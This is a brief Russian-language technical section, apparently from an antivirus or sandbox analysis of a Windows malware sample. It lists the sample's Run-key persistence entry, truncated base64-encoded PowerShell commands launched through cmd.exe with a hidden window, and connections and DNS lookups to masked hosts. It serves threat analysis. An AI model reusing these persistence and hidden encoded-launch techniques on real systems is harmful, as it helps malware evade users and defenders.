Техническая информация
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Run] 'Keyname' = '%APPDATA%\jO_1V_X.exe'
- '<SYSTEM32>\cmd.exe' /c POwErsHell -e ZgB1AG4AYwB0AGkAbwBuACAAVwBnAGsAXwAxAFUAcgBhAEYAbgBzAGUAWgBjAFMAWABfAFAARQBfAG4AXwAzAEwASAAgACgAIAAkAFIAMQBWADIAeABKAGMAXwBvAHQAXwBfAEsAcQA5AF8AOABfADUAUABRAFIAOABHAHoAOQBaAEcA...
- %APPDATA%\jo_1v_x.exe
- 'sp###ploit.com':443
- 'pk#.goog':80
- http://pk#.goog/gsr1/gsr1.crt
- 'sp###ploit.com':443
- DNS ASK sp###ploit.com
- DNS ASK pk#.goog
- '<SYSTEM32>\cmd.exe' /c POwErsHell -e ZgB1AG4AYwB0AGkAbwBuACAAVwBnAGsAXwAxAFUAcgBhAEYAbgBzAGUAWgBjAFMAWABfAFAARQBfAG4AXwAzAEwASAAgACgAIAAkAFIAMQBWADIAeABKAGMAXwBvAHQAXwBfAEsAcQA5AF8AOABfADUAUABRAFIAOABHAHoAOQBaAEcA...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e ZgB1AG4AYwB0AGkAbwBuACAAVwBnAGsAXwAxAFUAcgBhAEYAbgBzAGUAWgBjAFMAWABfAFAARQBfAG4AXwAzAEwASAAgACgAIAAkAFIAMQBWADIAeABKAGMAXwBvAHQAXwBfAEsAcQA5AF8AOABfADUAUABRAFIAOABHAHoAOQBaAEcAXwAgACwAIAAkAH...